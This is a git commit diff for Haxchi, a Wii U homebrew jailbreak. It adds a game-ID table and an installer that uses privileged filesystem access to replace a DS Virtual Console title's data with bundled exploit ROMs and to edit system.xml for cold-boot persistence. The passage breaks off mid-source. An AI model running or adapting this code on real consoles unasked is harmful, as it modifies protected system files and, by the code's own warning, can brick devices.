- Added the haxchi installer

- Move roms creation into sub folder
- re-add support for other base games

.gitignore

@@ -1,4 +1,2 @@
-*.nds
-*.zip
-*.bin
-defines.s
+haxchi_installer/data/
+haxchi_installer/src/zipList.h

Makefile

@@ -1,30 +1,7 @@
-.PHONY := all code550.bin
-
-ifeq ($(Windows_NT), 1)
-	ZIP = zip/zip.exe
-else
-	ZIP = zip
-endif
-
-HAXCHI_S = haxchi.s
-ROP_S = haxchi_rop.s
-ROP_BIN = haxchi_rop.bin
-all: clean brainage rom.zip 
-
-brainage: setup_brainage brainage.nds
-
-setup_brainage: 
-	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
-	@cp -f brainage_defs.s defines.s
-
-brainage.nds:
-	@armips $(ROP_S)
-	@armips $(HAXCHI_S)
-	@mv rom.nds brainage.nds
-
-rom.zip:
-	$(ZIP) -JXjq9 rom.zip brainage.nds
+all:
+	$(MAKE) -C "payload_generator"
+	$(MAKE) -C "haxchi_installer"
 
 clean:
-	@rm -f *.zip *.nds defines.s
-	@echo "all cleaned up !"
+	$(MAKE) -C "payload_generator" clean
+	$(MAKE) -C "haxchi_installer" clean

README.md

@@ -1,22 +1,13 @@
 # Haxchi
-
 This is the continuation of Haxchi from FIX94 (initial PoC by smea).  
 
-# Usage
-Put a payload `code550.bin` in the root of this project.  
-This payload should be statically linked to 0x18000000, and is called inside a thread.  
-Make sure to exit this thread via `OSExitThread(0);`, afterwards the rop switches automatically to the Mii Maker.  
+This repository consists of two parts:
 
-An example payload which perform the kernel exploit can be found [here](https://github.com/wiiu-env/haxchi_payload).
+- payload_generator, which will be used to create the target ROM which contain haxhi.
+- haxchi_installer, is an installer which can be used to install haxchi onto your console.
 
-# Notes
-
-Currently this ONLY executes a given `code550.bin`, nothing usable for the end user. Only one game, no CFW, no coldboothax, nothing.
-
-## Dependencies
-
-armnips and zip
+## Building
+Checkout the individual READMEs of those two folder to get more information about building.
 
 ## credit
-
 smea, plutoo, yellows8, naehrwert, derrek, FIX94, dimok and orboditilt.

haxchi_installer/.gitignore

@@ -0,0 +1,16 @@
+/fs/build
+/installer/bin
+/loader/build
+/menu/build
+/server/logs/*.txt
+/build
+/*.elf
+/fs/*.elf
+/loader/*.elf
+/sd_loader/build
+/sd_loader/*.elf
+/udp_debug_reader/obj
+/udp_debug_reader/GeckoLog.txt
+*.cscope_file_list
+*.rpx
+*.cbp

haxchi_installer/Makefile

@@ -0,0 +1,138 @@
+#-------------------------------------------------------------------------------
+.SUFFIXES:
+#-------------------------------------------------------------------------------
+
+ifeq ($(strip $(DEVKITPRO)),)
+$(error "Please set DEVKITPRO in your environment. export DEVKITPRO=<path to>/devkitpro")
+endif
+
+TOPDIR ?= $(CURDIR)
+
+include $(DEVKITPRO)/wut/share/wut_rules
+
+#-------------------------------------------------------------------------------
+# TARGET is the name of the output
+# BUILD is the directory where object files & intermediate files will be placed
+# SOURCES is a list of directories containing source code
+# DATA is a list of directories containing data files
+# INCLUDES is a list of directories containing header files
+#-------------------------------------------------------------------------------
+TARGET		:=	$(notdir $(CURDIR))
+BUILD		:=	build
+SOURCES		:=	src \
+				src/utils
+DATA		:=	data
+INCLUDES	:=	src
+
+#-------------------------------------------------------------------------------
+# options for code generation
+#-------------------------------------------------------------------------------
+CFLAGS	:=	-g -Wall -O2 -ffunction-sections \
+			$(MACHDEP)
+
+CFLAGS	+=	$(INCLUDE) -D__WIIU__ -D__WUT__ -D_GNU_SOURCE
+
+CXXFLAGS	:= $(CFLAGS)
+
+ASFLAGS	:=	-g $(ARCH)
+LDFLAGS	=	-g $(ARCH) $(RPXSPECS) -Wl,-Map,$(notdir $*.map)
+
+LIBS	:=  -lxml2 -lz -liosuhax -lwut 
+
+#-------------------------------------------------------------------------------
+# list of directories containing libraries, this must be the top level
+# containing include and lib
+#-------------------------------------------------------------------------------
+LIBDIRS	:= $(PORTLIBS) $(WUT_ROOT)
+
+#-------------------------------------------------------------------------------
+# no real need to edit anything past this point unless you need to add additional
+# rules for different file extensions
+#-------------------------------------------------------------------------------
+ifneq ($(BUILD),$(notdir $(CURDIR)))
+#-------------------------------------------------------------------------------
+export OUTPUT	:=	$(CURDIR)/$(TARGET)
+export TOPDIR	:=	$(CURDIR)
+
+export VPATH	:=	$(foreach dir,$(SOURCES),$(CURDIR)/$(dir)) \
+			$(foreach dir,$(DATA),$(CURDIR)/$(dir))
+
+export DEPSDIR	:=	$(CURDIR)/$(BUILD)
+
+CFILES		:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.c)))
+CPPFILES	:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.cpp)))
+SFILES		:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.s)))
+BINFILES	:=	$(foreach dir,$(DATA),$(notdir $(wildcard $(dir)/*.*)))
+
+#-------------------------------------------------------------------------------
+# use CXX for linking C++ projects, CC for standard C
+#-------------------------------------------------------------------------------
+ifeq ($(strip $(CPPFILES)),)
+#-------------------------------------------------------------------------------
+	export LD	:=	$(CC)
+#-------------------------------------------------------------------------------
+else
+#-------------------------------------------------------------------------------
+	export LD	:=	$(CXX)
+#-------------------------------------------------------------------------------
+endif
+#-------------------------------------------------------------------------------
+
+export OFILES_BIN	:=	$(addsuffix .o,$(BINFILES))
+export OFILES_SRC	:=	$(CPPFILES:.cpp=.o) $(CFILES:.c=.o) $(SFILES:.s=.o)
+export OFILES 	:=	$(OFILES_BIN) $(OFILES_SRC)
+export HFILES_BIN	:=	$(addsuffix .h,$(subst .,_,$(BINFILES)))
+
+export INCLUDE	:=	$(foreach dir,$(INCLUDES),-I$(CURDIR)/$(dir)) \
+			$(foreach dir,$(LIBDIRS),-I$(dir)/include) \
+			-I$(CURDIR)/$(BUILD) -I$(PORTLIBS_PATH)/ppc/include/libxml2
+
+export LIBPATHS	:=	$(foreach dir,$(LIBDIRS),-L$(dir)/lib)
+
+.PHONY: $(BUILD) clean all
+
+#-------------------------------------------------------------------------------
+all: $(BUILD)
+
+$(BUILD):
+	@[ -d $@ ] || mkdir -p $@	
+	sh ./filelist.sh
+	@$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
+
+#-------------------------------------------------------------------------------
+clean:
+	@echo clean ...
+	@rm -fr $(BUILD) $(TARGET).rpx $(TARGET).elf
+
+#-------------------------------------------------------------------------------
+else
+.PHONY:	all
+
+DEPENDS	:=	$(OFILES:.o=.d)
+
+#-------------------------------------------------------------------------------
+# main targets
+#-------------------------------------------------------------------------------
+all	:	$(OUTPUT).rpx
+
+$(OUTPUT).rpx	:	$(OUTPUT).elf
+$(OUTPUT).elf	:	$(OFILES)
+
+$(OFILES_SRC)	: $(HFILES_BIN)
+
+#-------------------------------------------------------------------------------
+# you need a rule like this for each extension you use as binary data
+#-------------------------------------------------------------------------------
+%.bin.o	%_bin.h :	%.bin
+	@echo $(notdir $<)
+	@$(bin2o)
+	
+%.zip.o	%_zip.h :	%.zip
+	@echo $(notdir $<)
+	@$(bin2o)
+
+-include $(DEPENDS)
+
+#-------------------------------------------------------------------------------
+endif
+#-------------------------------------------------------------------------------

haxchi_installer/README.md

@@ -0,0 +1,22 @@
+# Haxchi Installer
+This installer can be used to install haxchi onto your console.
+To install haxchi, you need a compatible title installed on your console.
+
+## Building
+Before you can build the haxchi installer, make sure to generate the haxchi-payloads using the payload-generator.
+
+You also need [wut](https://github.com/devkitPro/wut/), [libiosuhax](https://github.com/wiiu-env/libiosuhax) and the following portlibs installed:
+```
+pacman -Syu ppc-zlib ppc-libxml2
+```
+
+Then compile the installer via 
+```
+make
+```
+
+## Usage
+Start the resulting `haxchi_installer.rpx` using the {homebrew launcher](https://github.com/wiiu-env/homebrew_launcher)
+
+## credit
+FIX94 and orboditilt.

haxchi_installer/filelist.sh

@@ -0,0 +1,60 @@
+#! /bin/bash
+#
+# Automatic resource file list generation
+# Created by Dimok
+
+outFile="./src/ziplist.h"
+count_old=$(cat $outFile 2>/dev/null | tr -d '\n\n' | sed 's/[^0-9]*\([0-9]*\).*/\1/')
+
+count=0
+if [[ $OSTYPE == darwin* ]];
+then
+
+for i in $(gfind ./data/ -maxdepth 1 -type f  \( ! -printf "%f\n" \) | sort -f)
+do
+	files[count]=$i
+	count=$((count+1))
+done
+
+else
+
+for i in $(find ./data/ -maxdepth 1 -type f  \( ! -printf "%f\n" \) | sort -f)
+do
+	files[count]=$i
+	count=$((count+1))
+done
+
+fi
+
+if [ "$count_old" != "$count" ] || [ ! -f $outFile ]
+then
+
+echo "Generating filelist.h for $count files." >&2
+cat <<EOF > $outFile
+/****************************************************************************
+ * This file is generated automatically.
+ * Includes $count files.
+ *
+ * NOTE:
+ * Any manual modification of this file will be overwriten by the generation.
+ ****************************************************************************/
+
+#ifndef _ZIPLIST_H_
+#define _ZIPLIST_H_
+EOF
+
+for i in ${files[@]}
+do
+	filename=${i%.*}
+	extension=${i##*.}
+	echo 'extern const unsigned char '$filename'_'$extension'[];' >> $outFile
+	echo 'extern const unsigned int '$filename'_'$extension'_size;' >> $outFile
+	echo '' >> $outFile
+done
+
+echo '' >> $outFile
+echo '#endif' >> $outFile
+
+
+
+fi

haxchi_installer/src/gameList.h

@@ -0,0 +1,106 @@
+
+#ifndef _GAMELIST_H_
+#define _GAMELIST_H_
+
+#include "zipList.h"
+
+typedef struct _gList_t {
+	uint32_t tid;
+	char name[64];
+	const unsigned char *romPtr;
+	const unsigned int *romSizePtr;
+} gList_t;
+
+gList_t GameList[] = {
+	{ 0x10179A00, "Kawashima: Motto Nou wo Kitaeru Otona no DS Training [JPN]", brainage_zip, &brainage_zip_size },
+	{ 0x10179B00, "Brain Age: Train Your Brain in Minutes a Day! [USA]", brainage_zip, &brainage_zip_size },
+	{ 0x10179C00, "Dr. Kawashima's Brain Training [PAL]", brainage_zip, &brainage_zip_size },
+
+	{ 0x10179D00, "Catch! Touch! Yoshi! [JPN]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
+	{ 0x10179E00, "Yoshi Touch & Go [USA]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
+	{ 0x10179F00, "Yoshi Touch & Go [PAL]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
+
+	{ 0x10195600, "Mario Kart DS [JPN]", mariokartds_zip, &mariokartds_zip_size },
+	{ 0x10195700, "Mario Kart DS [USA]", mariokartds_zip, &mariokartds_zip_size },
+	{ 0x10195800, "Mario Kart DS [PAL]", mariokartds_zip, &mariokartds_zip_size },
+
+	{ 0x10195900, "New Super Mario Bros. [JPN]", newsmb_zip, &newsmb_zip_size },
+	{ 0x10195A00, "New Super Mario Bros. [USA]", newsmb_zip, &newsmb_zip_size },
+	{ 0x10195B00, "New Super Mario Bros. [PAL]", newsmb_eur_zip, &newsmb_eur_zip_size },
+
+	{ 0x10198800, "Yoshi's Island DS [JPN]", yoshids_zip, &yoshids_zip_size },
+	{ 0x10198900, "Yoshi's Island DS [USA]", yoshids_zip, &yoshids_zip_size },
+	{ 0x10198A00, "Yoshi's Island DS [PAL]", yoshids_zip, &yoshids_zip_size },
+
+	{ 0x10198B00, "Yawaraka Atama Juku [JPN]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
+	{ 0x10198C00, "Big Brain Academy [USA]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
+	{ 0x10198D00, "Big Brain Academy [PAL]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
+
+	{ 0x101A1E00, "Sawaru: Made in Wario [JPN]", wwtouched_zip, &wwtouched_zip_size },
+	{ 0x101A1F00, "WarioWare: Touched! [USA]", wwtouched_zip, &wwtouched_zip_size },
+	{ 0x101A2000, "WarioWare: Touched! [PAL]", wwtouched_zip, &wwtouched_zip_size },
+
+	{ 0x101A2100, "Mario & Luigi RPG 2x2 [JPN]", partnersintime_zip, &partnersintime_zip_size },
+	{ 0x101A2200, "Mario & Luigi: Partners in Time [USA]", partnersintime_zip, &partnersintime_zip_size },
+	{ 0x101A2300, "Mario & Luigi: Partners in Time [PAL]", partnersintime_zip, &partnersintime_zip_size },
+
+	{ 0x101A5200, "Donkey Kong: Jungle Climber [JPN]", dkjclimber_zip, &dkjclimber_zip_size },
+	{ 0x101A5300, "DK: Jungle Climber [USA]", dkjclimber_zip, &dkjclimber_zip_size },
+	{ 0x101A5400, "Donkey Kong: Jungle Climber [PAL]", dkjclimber_zip, &dkjclimber_zip_size },
+
+	{ 0x101A5500, "Hoshi no Kirby: Sanjou! Dorocche Dan [JPN]", kirby_zip, &kirby_zip_size },
+	{ 0x101A5600, "Kirby: Squeak Squad [USA]", kirby_zip, &kirby_zip_size },
+	{ 0x101A5700, "Kirby: Mouse Attack [PAL]", kirby_zip, &kirby_zip_size },
+
+	{ 0x101ABD00, "Kaitou Wario the Seven [JPN]", masterofdisguise_zip, &masterofdisguise_zip_size },
+	{ 0x101ABE00, "Wario: Master of Disguise [USA]", masterofdisguise_zip, &masterofdisguise_zip_size },
+	{ 0x101ABF00, "Wario: Master of Disguise [PAL]", masterofdisguise_zip, &masterofdisguise_zip_size },
+
+	{ 0x101AC000, "Star Fox Command [JPN]", sfcommand_zip, &sfcommand_zip_size },
+	{ 0x101AC100, "Star Fox Command [USA]", sfcommand_zip, &sfcommand_zip_size },
+	{ 0x101AC200, "Star Fox Command [PAL]", sfcommand_zip, &sfcommand_zip_size },
+
+	{ 0x101B8800, "Touch! Kirby's Magic Paintbrush [JPN]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
+	{ 0x101B8900, "Kirby: Canvas Curse [USA]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
+	{ 0x101B8A00, "Kirby: Power Paintbrush [PAL]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
+
+	{ 0x101B8B00, "Zelda no Densetsu: Daichi no Kiteki [JPN]", zeldast_zip, &zeldast_zip_size },
+	{ 0x101B8C00, "The Legend of Zelda: Spirit Tracks [USA]", zeldast_zip, &zeldast_zip_size },
+	{ 0x101B8D00, "The Legend of Zelda: Spirit Tracks [PAL]", zeldast_zip, &zeldast_zip_size },
+
+	{ 0x101C3300, "Super Mario 64 DS [JPN]", sm64ds_zip, &sm64ds_zip_size },
+	{ 0x101C3400, "Super Mario 64 DS [USA]", sm64ds_zip, &sm64ds_zip_size },
+	{ 0x101C3500, "Super Mario 64 DS [PAL]", sm64ds_zip, &sm64ds_zip_size },
+
+	{ 0x101C3600, "Zelda no Densetsu: Mugen no Sunadokei [JPN]", zeldaph_zip, &zeldaph_zip_size },
+	{ 0x101C3700, "The Legend of Zelda: Phantom Hourglass [USA]", zeldaph_zip, &zeldaph_zip_size },
+	{ 0x101C3800, "The Legend of Zelda: Phantom Hourglass [PAL]", zeldaph_zip, &zeldaph_zip_size },
+
+	{ 0x101C8600, "Atsumete! Kirby [JPN]", kirbymassattack_zip, &kirbymassattack_zip_size },
+	{ 0x101C8700, "Kirby Mass Attack [USA]", kirbymassattack_zip, &kirbymassattack_zip_size },
+	{ 0x101C8800, "Kirby Mass Attack [PAL]", kirbymassattack_zip, &kirbymassattack_zip_size },
+
+	{ 0x101CC200, "Pokemon Ranger [JPN]", pokemonranger_zip, &pokemonranger_zip_size },
+	{ 0x101CC300, "Pokemon Ranger [USA]", pokemonranger_zip, &pokemonranger_zip_size },
+	{ 0x101CC400, "Pokemon Ranger [PAL]", pokemonranger_zip, &pokemonranger_zip_size },
+
+	{ 0x101D1F00, "Oideyo Doubutsu no Mori [JPN]", animalcrossing_zip, &animalcrossing_zip_size },
+	{ 0x101D2000, "Animal Crossing: Wild World [USA]", animalcrossing_zip, &animalcrossing_zip_size },
+	{ 0x101D2100, "Animal Crossing: Wild World [PAL]", animalcrossing_zip, &animalcrossing_zip_size },
+
+	{ 0x101E0C00, "Pokemon Fushigi no Dungeon: Sora no Tankentai [JPN]", explorersofsky_zip, &explorersofsky_zip_size },
+	{ 0x101E0D00, "Pokemon Mystery Dungeon: Explorers of Sky [USA]", explorersofsky_zip, &explorersofsky_zip_size },
+	{ 0x101E0E00, "Pokemon Mystery Dungeon: Explorers of Sky [PAL]", explorersofsky_zip, &explorersofsky_zip_size },
+
+	{ 0x101E0F00, "Pokemon Ranger: Batonnage [JPN]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
+	{ 0x101E1000, "Pokemon Ranger: Shadows of Almia [USA]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
+	{ 0x101E1100, "Pokemon Ranger: Shadows of Almia [PAL]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
+
+	{ 0x101E6F00, "Pokemon Ranger: Hikari no Kiseki [JPN]", guardiansigns_zip, &guardiansigns_zip_size },
+	{ 0x101E7000, "Pokemon Ranger: Guardian Signs [USA]", guardiansigns_zip, &guardiansigns_zip_size },
+	{ 0x101E7100, "Pokemon Ranger: Guardian Signs [PAL]", guardiansigns_zip, &guardiansigns_zip_size },
+};
+
+static const int GameListSize = sizeof(GameList) / sizeof(gList_t);
+
+#endif

haxchi_installer/src/main.c

@@ -0,0 +1,817 @@
+/*
+ * Copyright (C) 2016-2017 FIX94
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license.  See the LICENSE file for details.
+ */
+#include <string.h>
+#include <malloc.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <iosuhax.h>
+#include <coreinit/mcp.h>
+#include <vpad/input.h>
+
+#include <whb/proc.h>
+#include <whb/log.h>
+#include <whb/log_console.h>
+
+
+#include <coreinit/foreground.h>
+#include <coreinit/systeminfo.h>
+#include <proc_ui/procui.h>
+#include <sysapp/launch.h>
+#include <libxml/parser.h>
+#include <libxml/tree.h>
+#include <libxml/xpath.h>
+#include "main.h"
+#include "gameList.h"
+#include "memory.h"
+
+
+static const char *sdCardVolPath = "/vol/storage_sdcard_new";
+#ifdef CB
+static const char *systemXmlPath = "/vol/system/config/system.xml";
+static const char *systemXmlPath2 = "/vol/system/config/system_new.xml";
+static const char *syshaxXmlPath = "/vol/system/config/syshax.xml";
+#endif
+//just to be able to call async
+void someFunc(void *arg)
+{
+	(void)arg;
+}
+
+extern void OSForceFullRelaunch(void);
+extern 	unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp);
+
+
+void println_noflip(int line, const char *msg)
+{
+	WHBLogPrintf(msg);
+	WHBLogConsoleDraw();
+}
+
+void println(int line, const char *msg)
+{
+	WHBLogPrintf(msg);
+	WHBLogConsoleDraw();
+}
+
+typedef struct _parsedList_t {
+	uint32_t tid;
+	char name[64];
+	char path[64];
+	uint8_t *romPtr;
+	uint32_t romSize;
+} parsedList_t;
+
+int fsa_read(int fsa_fd, int fd, void *buf, int len)
+{
+	int done = 0;
+	uint8_t *buf_uint8_t = (uint8_t*)buf;
+	while(done < len)
+	{
+		size_t read_size = len - done;
+		int result = IOSUHAX_FSA_ReadFile(fsa_fd, buf_uint8_t + done, 0x01, read_size, fd, 0);
+		if(result < 0)
+			return result;
+		else
+			done += result;
+	}
+	return done;
+}
+
+int fsa_write(int fsa_fd, int fd, void *buf, int len)
+{
+	int done = 0;
+	uint8_t *buf_uint8_t = (uint8_t*)buf;
+	while(done < len)
+	{
+		size_t write_size = len - done;
+		int result = IOSUHAX_FSA_WriteFile(fsa_fd, buf_uint8_t + done, 0x01, write_size, fd, 0);
+		if(result < 0)
+			return result;
+		else
+			done += result;
+	}
+	return done;
+}
+
+int availSort(const void *c1, const void *c2)
+{
+	return strcmp(((parsedList_t*)c1)->name,((parsedList_t*)c2)->name);
+}
+
+void printhdr_noflip()
+{
+#ifdef CB
+	println_noflip(0,"CBHC v1.6 by FIX94");
+#else
+	println_noflip(0,"Haxchi v2.5u2 by FIX94");
+#endif
+	println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok");
+}
+
+static uint32_t
+procSaveCallback(void *context) {
+    OSSavesDone_ReadyToRelease();
+    return 0;
+}
+
+int cleanupAndExitToHBL(){
+	memoryRelease();
+	WHBLogConsoleFree();
+	WHBProcShutdown();
+	return EXIT_SUCCESS;
+}
+
+int main(void)
+{	
+
+	OSEnableHomeButtonMenu(FALSE);
+	 WHBProcInit();
+	WHBLogConsoleInit();
+
+	VPADInit();
+	memoryInitialize();
+
+	int mcp_handle = MCP_Open();
+	int count = MCP_TitleCount(mcp_handle);
+	int listSize = count*sizeof(MCPTitleListType);
+	MCPTitleListType *tList = (MCPTitleListType*)memalign(32, listSize); //cant be in MEMBucket
+	memset(tList, 0, listSize);
+	uint32_t recievedCount = count;
+	MCP_TitleList(mcp_handle, &recievedCount, tList, listSize);
+	MCP_Close(mcp_handle);
+
+	int gAvailCnt = 0;
+	parsedList_t *gAvail = (parsedList_t*)MEMBucket_alloc(recievedCount*sizeof(parsedList_t), 4);
+	memset(gAvail, 0, recievedCount*sizeof(parsedList_t));
+
+	int i, j;
+	for(i = 0; i < recievedCount; i++)
+	{
+		MCPTitleListType cListElm = tList[i];
+		if(memcmp(cListElm.indexedDevice,"mlc",4) != 0 || ((cListElm.titleId & 0xFFFFFFFF00000000L) != 0x0005000000000000L))
+			continue;
+		for(j = 0; j < GameListSize; j++)
+		{
+			if((cListElm.titleId & 0x00000000FFFFFFFFL) == GameList[j].tid)
+			{
+				gAvail[gAvailCnt].tid = GameList[j].tid;
+				memcpy(gAvail[gAvailCnt].name, GameList[j].name, 64);
+				memcpy(gAvail[gAvailCnt].path, cListElm.path, 64);
+				gAvail[gAvailCnt].romPtr = GameList[j].romPtr;
+				gAvail[gAvailCnt].romSize = *(GameList[j].romSizePtr);
+				gAvailCnt++;
+				break;
+			}
+		}
+	}
+
+	int vpadError = -1;
+	VPADStatus vpad;
+
+	if(gAvailCnt == 0)
+	{
+		printhdr_noflip();
+		println_noflip(2,"No games found on NAND! Make sure that you have your DS VC");
+		println_noflip(3,"game installed on NAND and have all of your USB Devices");
+		println_noflip(4,"disconnected while installing Haxchi as it can lead to issues.");
+		println_noflip(5,"Press any button to return to Homebrew Launcher.");
+
+		while(1)
+		{
+			usleep(25000);
+			VPADRead(0, &vpad, 1, &vpadError);
+			if(vpadError != 0)
+				continue;
+			if(vpad.trigger | vpad.hold)
+				break;
+		}
+		return cleanupAndExitToHBL();
+	}
+
+	qsort(gAvail,gAvailCnt,sizeof(parsedList_t),availSort);
+
+	uint32_t redraw = 1;
+	int32_t PosX = 0;
+	int32_t ScrollX = 0;
+
+	int32_t ListMax = gAvailCnt;
+	if( ListMax > 13 )
+		ListMax = 13;
+
+	uint32_t UpHeld = 0, triggerHeld = 0;
+	while(1)
+	{
+		usleep(25000);
+		VPADRead(0, &vpad, 1, &vpadError);
+		if(vpadError != 0)
+			continue;
+
+		if((vpad.trigger | vpad.hold) & VPAD_BUTTON_HOME)
+		{
+			
+			return cleanupAndExitToHBL();
+		}
+		if( vpad.hold & VPAD_BUTTON_DOWN)
+		{
+			if(triggerHeld == 0 || triggerHeld > 10)
+			{
+				if( PosX + 1 >= ListMax )
+				{
+					if( PosX + 1 + ScrollX < gAvailCnt)
+						ScrollX++;
+					else {
+						PosX	= 0;
+						ScrollX = 0;
+					}
+				} else {
+					PosX++;
+				}
+				redraw = 1;
+			}
+			triggerHeld++;
+		}
+		else
+			triggerHeld = 0;
+
+		if( vpad.hold & VPAD_BUTTON_UP )
+		{
+			if(UpHeld == 0 || UpHeld > 10)
+			{
+				if( PosX <= 0 )
+				{
+					if( ScrollX > 0 )
+						ScrollX--;
+					else {
+						PosX	= ListMax - 1;
+						ScrollX = gAvailCnt - ListMax;
+					}
+				} else {
+					PosX--;
+				}
+				redraw = 1;
+			}
+			UpHeld++;
+		}
+		else
+			UpHeld = 0;
+
+		if( vpad.trigger & VPAD_BUTTON_A )
+			break;
+
+		if( redraw )
+		{
+			
+			printhdr_noflip();
+			println_noflip(2,"Please select the game for the Installation from the list below.");
+			// Starting position.
+			int gamelist_y = 4;
+			for (i = 0; i < ListMax; ++i, gamelist_y++)
+			{
+				const parsedList_t *cur_gi = &gAvail[i+ScrollX];
+				char printStr[64];
+				sprintf(printStr,"%c %s", i == PosX ? '>' : ' ', cur_gi->name);
+				println_noflip(gamelist_y, printStr);
+			}			
+			redraw = 0;
+		}
+	}
+#ifdef CB
+	int action = 0;
+#endif
+	const parsedList_t *SelectedGame = &gAvail[PosX + ScrollX];
+		println_noflip(2,"You have selected the following game:");
+		println_noflip(3,SelectedGame->name);
+#ifdef CB
+		println_noflip(4,"Press A to install CBHC, B to remove coldboothax, HOME to Exit.");
+		println_noflip(5,"WARNING, INSTALLING CBHC CAN POTENTIALLY BRICK YOUR SYSTEM!");
+		println_noflip(6,"NEVER UNINSTALL OR MOVE THE SELECTED GAME OR YOUR WIIU IS DEAD!");
+#else
+		println_noflip(4,"This will install Haxchi. To remove it you have to delete and");
+		println_noflip(5,"re-install the game. If you are sure press A, else press HOME.");
+#endif
+		
+	while(1)
+	{
+		usleep(25000);
+		VPADRead(0, &vpad, 1, &vpadError);
+		if(vpadError != 0)
+			continue;
+		//user aborted
+		if((vpad.trigger | vpad.hold) & VPAD_BUTTON_HOME)
+		{			
+			return cleanupAndExitToHBL();
+		}
+		//lets go!
+		if(vpad.trigger & VPAD_BUTTON_A)
+			break;
+#ifdef CB
+		if(vpad.trigger & VPAD_BUTTON_B)
+		{
+			action = 1;
+			break;
+		}
+#endif
+	}
+
+#ifdef CB	
+	unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0);
+	char sysmenuId[20];
+	memset(sysmenuId, 0, 20);
+	sprintf(sysmenuId, "%08x%08x", (uint32_t)((sysmenuIdUll>>32)&0xFFFFFFFF),(uint32_t)(sysmenuIdUll&0xFFFFFFFF));
+	char new_title_id[20];
+	memset(new_title_id, 0, 20);
+	sprintf(new_title_id, "00050000%08x", SelectedGame->tid);
+	int line = 7;
+#else
+	int line = 6;
+#endif
+
+	int fsaFd = -1;
+	int sdMounted = 0;
+	int sdFd = -1, mlcFd = -1, slcFd = -1;
+
+	//open up iosuhax
+	int res = IOSUHAX_Open(NULL);	
+	if(res < 0)
+	{
+		println(line++,"IOSUHAX_Open failed");
+		goto prgEnd;		
+	}
+
+	//mount with full permissions
+	fsaFd = IOSUHAX_FSA_Open();
+	if(fsaFd < 0)
+	{
+		println(line++,"FSA could not be opened!");
+		goto prgEnd;
+	}
+#ifdef CB
+	if(action == 1)
+	{
+		if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "rb", &slcFd) >= 0)
+		{
+			//read in system xml file
+			fileStat_s stats;
+			IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
+			size_t sysXmlSize = stats.size;
+			char *sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
+			memset(sysXmlBuf, 0, sysXmlSize+1);
+			fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+			slcFd = -1;
+			xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "system.xml", "utf-8", 0);
+			//verify title id
+			int idFound = 0, idCorrect = 0;
+			xmlNode *root_element = xmlDocGetRootElement(doc);
+			xmlNode *cur_node = NULL;
+			for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
+				if (cur_node->type == XML_ELEMENT_NODE) {
+					if(memcmp(cur_node->name, "default_title_id", 17) == 0)
+					{
+						if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
+						if(memcmp(new_title_id, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
+						idFound++;
+					}
+				}
+			}
+			xmlFreeDoc(doc);
+			MEMBucket_free(sysXmlBuf);
+			if(idFound != 1)
+				println(line++,"default_title_id missing!");
+			else if(idCorrect != 1)
+				println(line++,"default_title_id not set to selected DS VC!");
+			else
+			{
+				if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "rb", &slcFd) >= 0)
+				{
+					//read in system xml file
+					fileStat_s stats;
+					IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
+					size_t sysXmlSize = stats.size;
+					sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
+					memset(sysXmlBuf, 0, sysXmlSize+1);
+					fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
+					IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+					slcFd = -1;
+					xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "syshax.xml", "utf-8", 0);
+					//verify title id
+					int idFound = 0, idCorrect = 0;
+					xmlNode *root_element = xmlDocGetRootElement(doc);
+					xmlNode *cur_node = NULL;
+					for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
+						if (cur_node->type == XML_ELEMENT_NODE) {
+							if(memcmp(cur_node->name, "default_title_id", 17) == 0)
+							{
+								if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
+								if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
+								idFound++;
+							}
+						}
+					}
+					xmlFreeDoc(doc);
+					if(idFound != 1)
+						println(line++,"default_title_id missing!");
+					else if(idCorrect != 1)
+						println(line++,"default_title_id not set to System Menu!");
+					else
+					{
+						if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "wb", &slcFd) >= 0)
+						{
+							println(line++,"Restoring system.xml...");
+							fsa_write(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
+							IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+							slcFd = -1;
+							println(line++,"Removed coldboothax!");
+						}
+					}
+					MEMBucket_free(sysXmlBuf);
+				}
+				else
+					println(line++,"syshax.xml backup not found, aborting!");
+			}
